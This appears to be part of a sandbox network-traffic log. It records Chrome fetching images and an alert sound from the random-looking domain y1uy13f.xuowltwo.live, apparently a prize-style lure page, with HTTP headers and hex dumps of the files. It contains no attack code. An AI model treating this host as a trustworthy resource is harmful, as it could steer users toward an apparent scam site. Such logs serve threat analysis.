                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:41 GMT
                              Content-Type: image/png
                              Content-Length: 4560
                              Connection: close
                              ETag: "a660370feb6a1543c3c872a52f7bcfa7"
                              Last-Modified: Tue, 21 Nov 2023 12:30:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB72304C80B
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1695223402#767744778/gid:0/gname:root/mode:33279/mtime:1653412335#773078000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:15.773078Z
                              Expires: Fri, 21 Feb 2025 07:09:41 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC3313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b8 08 03 00 00 00 3f b7 12 c5 00 00 01 f5 50 4c 54 45 00 00 00 fe fe fe 9e 18 16 ef ef f0 a0 17 15 fb fb fb a1 18 16 ba 1c 1a a0 18 16 a0 18 16 c5 1e 1b f5 f6 f6 b9 1c 1a 91 16 14 c2 1d 1a a1 18 16 f1 f2 f2 bb 1c 1a ae 1a 18 f8 f8 f8 e3 22 1f f8 f8 f8 99 17 15 f9 fa fa a0 18 16 89 15 13 fb fb fb c6 1e 1b 93 16 14 fc fc fc b8 1b 19 8d 15 13 d0 20 1d f4 f4 f5 c3 1d 1b a2 18 16 f9 f9 f9 fc fc fc c0 1d 1a fd fd fd 88 14 12 9f 18 16 ec ed ed 98 17 15 a3 18 16 a6 19 17 f1 f2 f2 ee ee ef 92 16 14 f0 f1 f1 fe fe fe fc fc fc b7 1c 19 c5 1e 1b df 22 1f ae 1a 18 e4 ca ca b4 96 96 de 7e 7c fc fc fc b0 b1 b1 b5 3f 3d 72 12 11 e1 ba ba c0 1d 1b ac 1a 18 ef f0 f1 d1 d3 d4 a2 19 16 b1 1b 19 e2 22 1f a7
                              Data Ascii: PNGIHDR?PLTE" "~|?=r"
                              2024-02-22 07:09:41 UTC1247INData Raw: 8e 84 3a 14 14 7e 63 40 28 88 16 5c 9b 7e aa a7 4e 5f 3f 73 8b 3f 4e 67 25 97 1c 90 82 61 6e 40 64 53 b3 b3 e0 a6 2c 14 d0 dd 38 74 08 09 66 8f 7e f5 94 e5 db 04 c5 1b 93 00 94 a1 e0 97 54 4f 92 02 3c d1 56 80 1d 02 57 10 11 0f 12 2a 9b 9b 05 03 17 11 bf c6 5f 09 91 44 42 10 f5 1e a9 5f 28 c8 03 b1 0b f4 27 01 d6 44 eb 4f 0a 9e ca 4c 81 c2 15 c4 74 d2 11 bb c4 67 81 48 82 e6 66 c1 7d 32 c0 e6 01 1d 86 03 ee 40 2b 95 3a fa 4f 5a 4e f8 ee 76 f0 ef 14 14 08 f4 46 d7 ce 9c 81 02 95 2b 40 d3 15 a1 4e 19 bf be 6f 78 0c 34 39 0b ce c3 00 53 a0 38 0a 80 da 5d 2a ed ed 3f 99 11 83 ef 13 20 0c 00 74 4a 96 3f 78 8e ab e0 a2 47 01 36 de 5c c1 0b 2e 92 1b 68 ee 72 78 54 95 35 a1 20 ac a8 b2 43 1d 0a 4e 1f 4b 35 06 ef 64 00 09 20 a2 0d 0a 0a 7e 42 27 cf 5e 3d e7 2a c0
                              Data Ascii: :~c@(\~N_?s?Ng%an@dS,8tf~TO<VW*_DB_('DOLtgHf}2@+:OZNvF+@Nox49S8]*? tJ?xG6\.hrxT5 CNK5d ~B'^=*


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.449780185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:41 UTC375OUTGET /media/mainstream/all/ab/x1.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC782INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:41 GMT
                              Content-Type: image/png
                              Content-Length: 593
                              Connection: close
                              ETag: "ee850988ed56cd6f2498cae7993a8753"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB735799D6A
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#276024555/gid:0/gname:root/mode:33279/mtime:1653412336#881081000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:16.881081Z
                              Expires: Fri, 21 Feb 2025 07:09:41 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC593INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b8 08 03 00 00 00 3f b7 12 c5 00 00 00 5a 50 4c 54 45 00 00 00 22 1e 20 36 2e 30 36 34 36 40 3f 41 40 3f 41 41 40 42 22 1e 20 22 1e 20 22 1e 20 22 1e 20 41 40 42 22 1e 20 30 2d 2f 41 40 42 22 1e 20 41 40 42 22 1e 20 41 40 42 41 40 42 22 1e 20 41 40 42 41 40 42 22 1e 20 41 40 42 41 40 42 22 1e 20 22 1e 20 41 40 42 39 38 3a 81 71 50 c5 00 00 00 1b 74 52 4e 53 00 40 10 20 40 bf 80 80 e2 af bf 8f 70 30 ef cf 50 50 cf af 9f 60 9f 8f df 70 60 c2 d4 68 a2 00 00 01 8b 49 44 41 54 78 da ed d8 e1 5a a2 40 14 80 61 40 c0 32 d1 94 4d 2d d7 fb bf cd 75 77 9f a7 53 f1 07 a3 92 c1 f7 bd 83 f9 e6 cc 28 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 b8 26 cf f3 b2 2c 8b ec 26 e5 cb 5f eb e3 5f a7
                              Data Ascii: PNGIHDR?ZPLTE" 6.0646@?A@?AA@B" " " " A@B" 0-/A@B" A@B" A@BA@B" A@BA@B" A@BA@B" " A@B98:qPtRNS@ @p0PP`p`hIDATxZ@a@2M-uwS(&,&__


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.449781185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:41 UTC388OUTGET /media/mainstream/all/ab/box-iphone14pro.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:41 GMT
                              Content-Type: image/png
                              Content-Length: 4457
                              Connection: close
                              ETag: "e26ab4191e2b939c553ea223042be270"
                              Last-Modified: Tue, 21 Nov 2023 12:30:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB73750CF06
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1695223401#959742960/gid:0/gname:root/mode:33188/mtime:1667333084#863076000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-11-01T20:04:44.863076Z
                              Expires: Fri, 21 Feb 2025 07:09:41 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC3313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b9 08 03 00 00 00 f4 eb c1 60 00 00 02 fa 50 4c 54 45 00 00 00 41 40 40 29 28 27 16 15 15 3d 3c 3a 3b 39 38 5c 59 57 5a 56 54 51 4f 4d 05 05 04 6f 6d 6b 41 40 3f 0e 0c 08 09 08 05 40 3f 3e 25 25 24 3f 3d 3d 40 3f 3e 42 41 40 68 65 63 53 52 51 53 51 50 44 42 41 3d 3c 3b 72 6f 6e 21 1f 1f 6a 68 67 43 41 40 00 00 00 38 36 35 41 3e 3d 3b 39 37 51 4f 4d 3e 3c 3b 42 40 3f e8 de db 02 03 0c 01 02 08 45 43 42 56 54 52 02 04 10 2b 29 28 4a 48 46 3f 3d 3b 59 56 54 55 52 50 08 08 08 00 01 06 3d 3b 3a 4d 4b 4a 06 05 05 4f 4c 4b 27 25 25 25 23 23 29 27 27 1b 1a 1a 39 37 36 5a 57 55 0c 0b 0b 47 45 44 52 50 4e 14 13 13 16 15 16 e4 da d9 73 70 6d 5f 5c 5a 44 42 41 49 47 45 2d 2b 2a 03 03 02 54 51 4f e3
                              Data Ascii: PNGIHDR`PLTEA@@)('=<:;98\YWZVTQOMomkA@?@?>%%$?==@?>BA@hecSRQSQPDBA=<;ron!jhgCA@865A>=;97QOM><;B@?ECBVTR+)(JHF?=;YVTURP=;:MKJOLK'%%%##)''976ZWUGEDRPNspm_\ZDBAIGE-+*TQO
                              2024-02-22 07:09:41 UTC1144INData Raw: 0a 9c 1c 86 81 55 08 07 59 fa 08 2e 59 75 b0 0a 88 80 0a 7c c9 80 28 18 2b 1c d7 81 40 15 08 86 fe 2d 80 35 08 84 43 2a 42 70 f1 14 4d b9 a0 d7 7d 01 03 54 90 0d 94 75 10 04 00 80 f8 aa 09 81 09 ce af 89 81 83 7f 1a 84 26 10 e9 0c 5d 1f b1 b8 50 5b 03 cf c6 56 ab 6c 70 7c 1f 44 91 e7 8d a2 d8 86 04 b0 0a 61 d5 ff d2 01 6b 40 21 c1 e9 46 8d 4e d7 08 04 60 00 f9 2d 1b 60 0d 6e 3c a9 ad 10 05 6c 01 84 7d 33 f1 1f 01 b7 34 a3 a2 96 e0 6f bb 76 f0 9b 34 14 07 70 fc 1f 69 0b 34 5a e9 90 d2 95 52 b1 65 24 02 4d 9c 3a 9c 4b e3 88 8d 93 ab 25 2e 35 4b e3 50 8f 5e c6 c1 5d 0c 23 19 97 ee 68 34 7a d2 83 1a d0 9b ee ba 2b 7a da 01 b2 eb b2 2c bb f8 e3 f5 41 19 91 7a 7e 4b bf 09 e1 c0 a9 9f fc 5a 08 bf 07 06 ab 5a 11 2b 94 cb 68 0e 72 ac 62 e4 92 d1 e8 75 5a a0 50 1f
                              Data Ascii: UY.Yu|(+@-5C*BpM}Tu&]P[Vlp|Dak@!FN`-`n<l}34ov4pi4ZRe$M:K%.5KP^]#h4z+z,Az~KZZ+hrbuZP


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.449783185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:41 UTC381OUTGET /media/mainstream/all/ab/box_open.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC781INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:41 GMT
                              Content-Type: image/png
                              Content-Length: 2685
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "99264bee31a1abde5d0035468e53bbfb"
                              Last-Modified: Mon, 20 Feb 2023 09:33:01 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB73ED86BEC
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843277#847577324/gid:0/gname:root/mode:33279/mtime:1653412322#933050000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:02.93305Z
                              Expires: Fri, 21 Feb 2025 07:09:41 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC2685INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b9 08 03 00 00 00 f4 eb c1 60 00 00 00 c0 50 4c 54 45 00 00 00 cc ce cf c8 ca cb c8 ca cb dc de de b3 b5 b6 e3 e5 e5 ce d0 d1 e4 e6 e6 c7 c9 ca c9 cb cc c9 cb cc cb cd ce bc be c0 83 84 86 94 95 98 9f a1 a4 83 84 86 9f a1 a4 83 84 86 c8 ca cb 9f a1 a4 c9 cb cc c8 ca cb cc ce cf 83 84 86 9f a1 a4 cc ce cf 83 84 86 9f a1 a4 97 99 9c 83 84 86 83 84 86 9f a1 a4 e5 e7 e7 e4 e6 e6 e1 e3 e3 c7 c9 cb da dc dc de e0 e0 cd cf d0 d5 d7 d7 d0 d3 d4 d7 d9 d9 dd df df b5 b8 ba ca cc cd c4 c6 c7 c1 c3 c4 d2 d4 d5 bd c0 c1 ba bd bf e9 eb eb 9f a1 a4 82 83 85 9b 9d a0 94 96 99 ed ef ef 97 99 9c 7b 7c 7e ab ad af a4 a7 a9 88 89 8b 8f 90 92 b4 0f 84 af 00 00 00 23 74 52 4e 53 00 50 ef 9f 40 0f 80 40 bf df
                              Data Ascii: PNGIHDR`PLTE{|~#tRNSP@@


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.449782185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:41 UTC388OUTGET /media/mainstream/flag-icon/flags/1x1/us.svg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC787INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:41 GMT
                              Content-Type: image/svg+xml
                              Content-Length: 5519
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "1067e4f544573a808db9cf39397e3b8e"
                              Last-Modified: Mon, 20 Feb 2023 09:33:59 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB73F5B8712
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843396#115757529/gid:0/gname:root/mode:33279/mtime:1655387477#806640800/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-06-16T13:51:17.8066408Z
                              Expires: Fri, 21 Feb 2025 07:09:41 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC3309INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 68 65 69 67 68 74 3d 22 35 31 32 22 20 77 69 64 74 68 3d 22 35 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 31 32 20 35 31 32 22 3e 0d 0a 20 20 3c 67 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 73 63 61 6c 65 28 33 2e 39 33 38 35 29 22 3e 0d 0a 20 20 20 20 3c 67 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 70 74 22 3e 0d 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31
                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" height="512" width="512" viewBox="0 0 512 512"> <g fill-rule="evenodd" transform="scale(3.9385)"> <g stroke-width="1pt"> <path d="M0 0h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v1
                              2024-02-22 07:09:41 UTC2210INData Raw: 35 33 2d 31 2e 37 31 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 38 2d 32 2e 37 36 36 2d 32 2e 33 35 33 2d 31 2e 37 31 68 32 2e 39 30 39 7a 6d 31 36 2e 34 36 36 20 30 6c 2e 38 39 39 20 32 2e 37 36 37 68 32 2e 39 30 39 6c 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 20 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 2d 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 68 32 2e 39 31 7a 6d 31 36 2e 34 36 37 20 30 6c 2e 38 39 39 20 32 2e 37 36 37 68 32 2e 39 30 39 6c 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 20 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 2d 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 68 32 2e 39 31 7a 6d 31 36 2e 34 36 37 20 30 6c 2e 38 39 39 20
                              Data Ascii: 53-1.71-2.353 1.71.898-2.766-2.353-1.71h2.909zm16.466 0l.899 2.767h2.909l-2.353 1.71.899 2.766-2.354-1.71-2.353 1.71.899-2.766-2.354-1.71h2.91zm16.467 0l.899 2.767h2.909l-2.353 1.71.899 2.766-2.354-1.71-2.353 1.71.899-2.766-2.354-1.71h2.91zm16.467 0l.899


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.449785185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:41 UTC376OUTGET /media/mainstream/all/ab/fr4.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC784INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:41 GMT
                              Content-Type: image/jpeg
                              Content-Length: 4307
                              Connection: close
                              ETag: "f96150cbbb80ac607b3f264141a7faef"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB73D1D10E3
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#272024543/gid:0/gname:root/mode:33279/mtime:1653412324#641054000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.641054Z
                              Expires: Fri, 21 Feb 2025 07:09:41 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC3312INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 07 08 05 06 09 03 04 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 02 03 06 07 00 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 9d c1 36 9f 1e df 15
                              Data Ascii: JFIFCC<<6
                              2024-02-22 07:09:41 UTC995INData Raw: e8 23 ba 1c ad a0 19 21 1f 14 12 d3 90 8a b8 4e 5a a2 03 45 22 0d c5 f3 42 79 2f a4 13 f6 92 99 00 0a f5 46 46 5e 63 5b ec a0 bd b5 68 a4 c1 a1 89 d9 33 85 9a 70 e7 9a 15 32 00 ea 57 a8 88 27 75 32 0d 8d bc df 5d 05 4f f0 89 12 6e 4c 98 58 3f 10 7e e9 8f a2 10 01 a0 fb ab e4 75 d8 e5 ee 20 85 88 0b 85 60 c0 31 ba b4 4f e3 74 f7 09 30 00 24 5e d6 b9 4f 87 35 8d e3 cc 97 46 ba 94 e0 1d 3c c4 89 20 5c 6c 04 59 61 b9 d4 b8 79 68 b9 ca 57 a5 b6 1a 79 09 43 97 45 86 03 bb 74 4d 93 0d 3b 48 06 14 f3 06 cd 77 45 d6 1f a8 af ff c4 00 23 11 00 02 03 00 02 03 00 02 03 01 00 00 00 00 00 00 02 03 01 04 05 00 11 06 12 13 14 21 10 15 23 31 ff da 00 08 01 03 01 01 08 00 1d bb 3e df b5 ee f6 33 27 1e 40 5e b3 3c 57 90 21 83 33 31 78 21 12 d8 8f 26 a3 03 dc 8f 93 64 48 76
                              Data Ascii: #!NZE"By/FF^c[h3p2W'u2]OnLX?~u `1Ot0$^O5F< \lYayhWyCEtM;HwE#!#1>3'@^<W!31x!&dHv


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.449787185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:41 UTC383OUTGET /media/mainstream/all/ab/box_closed.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC781INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:41 GMT
                              Content-Type: image/png
                              Content-Length: 5836
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "890d869db1b3d28af588be81685214f2"
                              Last-Modified: Mon, 20 Feb 2023 09:33:01 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB754257035
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843277#847577324/gid:0/gname:root/mode:33279/mtime:1653412322#873050000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:02.87305Z
                              Expires: Fri, 21 Feb 2025 07:09:41 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC3315INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b8 08 03 00 00 00 3f b7 12 c5 00 00 01 b3 50 4c 54 45 00 00 00 f1 f2 f2 ee ef ef ac 1a 18 fe fe fe f3 f4 f4 d2 d4 d5 dd de df d2 d4 d5 de df e1 d2 d2 d4 d2 d4 d6 ed ee ee d5 d7 d9 d0 d2 d4 97 17 14 d2 d4 d6 8c 15 13 e1 e2 e3 bb 1c 1a a0 18 16 d0 d2 d4 d1 d3 d5 ed ee ef a8 19 16 c2 1d 1b cf d1 d3 b3 1b 19 e3 e4 e5 c2 1d 1a ef f0 f0 bf 1d 1a 96 17 15 c4 1e 1b 98 17 15 bf 1d 1a a7 19 17 c8 c4 c5 d8 2b 28 f0 f1 f1 b9 1c 19 cf d1 d3 b4 1b 18 ef f0 f0 a3 18 16 9b 17 15 8b 15 13 a0 18 16 8b 15 13 ca 1f 1c f5 f6 f6 f0 f1 f1 f7 f8 f8 f0 f0 f1 ed ef ef eb ec ec e6 e7 e7 d3 d4 d6 cf d1 d3 dd de df bd 1c 1a e0 e2 e2 a0 18 16 ad 1a 18 f6 f7 f7 d7 d9 da a9 1a 17 b3 1b 19 c2 1e 1b d5 d7 d8 de 21 1f c0
                              Data Ascii: PNGIHDR?PLTE+(!
                              2024-02-22 07:09:41 UTC2521INData Raw: e7 6d 17 46 db 4f 4c 2b 58 d9 0a 98 a6 0f 14 dc 43 05 66 f5 cd 2d 9b f8 5b b3 20 15 bc 2b 68 8c cc 3e 7d 36 20 15 54 40 41 12 b3 0a 47 48 81 be d2 b5 cb 17 bb bb fe 35 bb a2 42 11 22 1b 55 0a 26 9f 14 07 52 0a 6e a3 82 fe 86 df d2 b6 db c2 37 59 90 5e 7a 17 51 8f 96 f0 9c 34 f4 74 80 31 a5 a0 da 1b c7 a1 c8 82 af fa 42 56 b1 10 9d ea fa c7 90 02 e2 1d 13 4c ce 14 8b eb 29 05 4d 52 70 cb 24 80 8e be 9d 6b 6e cb d2 9b e7 6a c0 85 f1 10 14 04 4a 41 a9 1e 03 e2 bf e2 8d 51 f4 ae 13 21 d9 28 b8 75 ab d1 68 44 03 8c 98 7a 65 d9 fe 7a c8 14 b1 50 50 23 01 46 81 5c fb 5c da c0 35 37 1d 3c 61 46 09 54 30 f4 91 6b 05 5e 0c f4 0a 05 be 53 8b 80 0c 15 14 e8 a7 62 53 c2 c0 eb e8 96 e3 a6 14 dc 24 05 23 85 b6 19 00 8f 34 d7 90 f6 a5 4f 8f 12 ce e3 fe d9 a1 65 a3 80 c7
                              Data Ascii: mFOL+XCf-[ +h>}6 T@AGH5B"U&Rn7Y^zQ4t1BVL)MRp$knjJAQ!(uhDzezPP#F\\57<aFT0k^SbS$#4Oe


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              49192.168.2.449786185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:41 UTC676OUTGET /media/mainstream/alert.mp3 HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
